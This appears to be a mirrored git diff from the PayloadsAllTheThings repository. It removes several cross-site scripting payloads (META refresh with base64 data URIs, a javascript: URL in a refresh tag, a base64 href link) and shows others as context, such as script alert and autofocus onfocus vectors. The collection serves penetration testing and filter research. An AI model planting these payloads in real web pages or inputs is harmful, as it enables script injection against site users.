mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-20 03:16:10 +00:00
commit
bb0177916d
@ -122,18 +122,6 @@ you can also specify an arbitratry payload with 14.rs/#payload
|
|||||||
e.g: 14.rs/#alert(document.domain)
|
e.g: 14.rs/#alert(document.domain)
|
||||||
```
|
```
|
||||||
|
|
||||||
XSS in META tag
|
|
||||||
|
|
||||||
```javascript
|
|
||||||
Base64 encoded
|
|
||||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
|
||||||
|
|
||||||
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
|
|
||||||
|
|
||||||
With an additional URL
|
|
||||||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
|
||||||
```
|
|
||||||
|
|
||||||
XSS in Hidden input
|
XSS in Hidden input
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
@ -162,12 +150,6 @@ URL/<script>alert('XSS');//
|
|||||||
URL/<input autofocus onfocus=alert(1)>
|
URL/<input autofocus onfocus=alert(1)>
|
||||||
```
|
```
|
||||||
|
|
||||||
XSS using base64 encoded href data in a link
|
|
||||||
|
|
||||||
```
|
|
||||||
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ+" target="_blank">here</a>
|
|
||||||
```
|
|
||||||
|
|
||||||
## XSS in wrappers javascript and data URI
|
## XSS in wrappers javascript and data URI
|
||||||
|
|
||||||
XSS with javascript:
|
XSS with javascript:
|
||||||
|
Loading…
Reference in New Issue
Block a user